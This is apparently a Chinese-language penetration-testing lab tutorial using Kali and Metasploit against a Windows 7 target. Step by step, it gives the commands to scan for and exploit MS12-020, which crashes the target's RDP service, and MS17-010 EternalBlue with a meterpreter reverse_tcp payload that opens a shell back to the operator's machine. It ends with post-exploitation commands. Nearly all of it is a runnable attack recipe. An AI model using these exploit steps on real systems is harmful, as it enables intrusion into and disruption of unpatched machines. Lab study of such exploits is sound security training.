操作机：

kali

靶机：

windows 7

永恒之蓝

1.打开kali，进入终端界面

2.启动Metasploit

msfdb init && msfconsole

3.检测靶机是否存在ms12-020漏洞

1）输入以下命令查找ms12-020相关模块

search ms12-020

 2)使用ms12_020_check模块对目标进行漏洞检测

use 1          //使用ms12_020_check模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
run            // 执行

 4.利用ms12-020漏洞对靶机进行攻击

use 0         //使用ms12_020_maxchannelids模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
run            // 执行

 查看windows 7

 溢出攻击

1.启动Metasploit

msfdb init && msfconsole

 2.检测靶机是否存在ms17-010漏洞

1）输入以下命令查找ms17-010相关模块

search ms17-010

2）使用auxiliary/scanner/smb/smb_ms17_010 模块对目标进行漏洞检测

use 1          //使用smb_ms17_010 模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
run            // 执行

 3.利用ms17-010漏洞对靶机进行溢出攻击

use 3         //使用ms17_010_eternalblue模块
show options   //查看该模块需要哪些参数
set rhosts   靶机ip   //设置目标ip地址
set lhost   操作机ip   // 设置本地ip地址
set payload windows/x64/meterpreter/reverse_tcp  //使用payload
set rport 445   //设置目标端口
set target 0       //设置目标操作系统类型（自动识别）
run            // 执行

 4.后渗透模块meterpreter的使用

pwd       //打印当前工作目录
sysinfo   //查看系统信息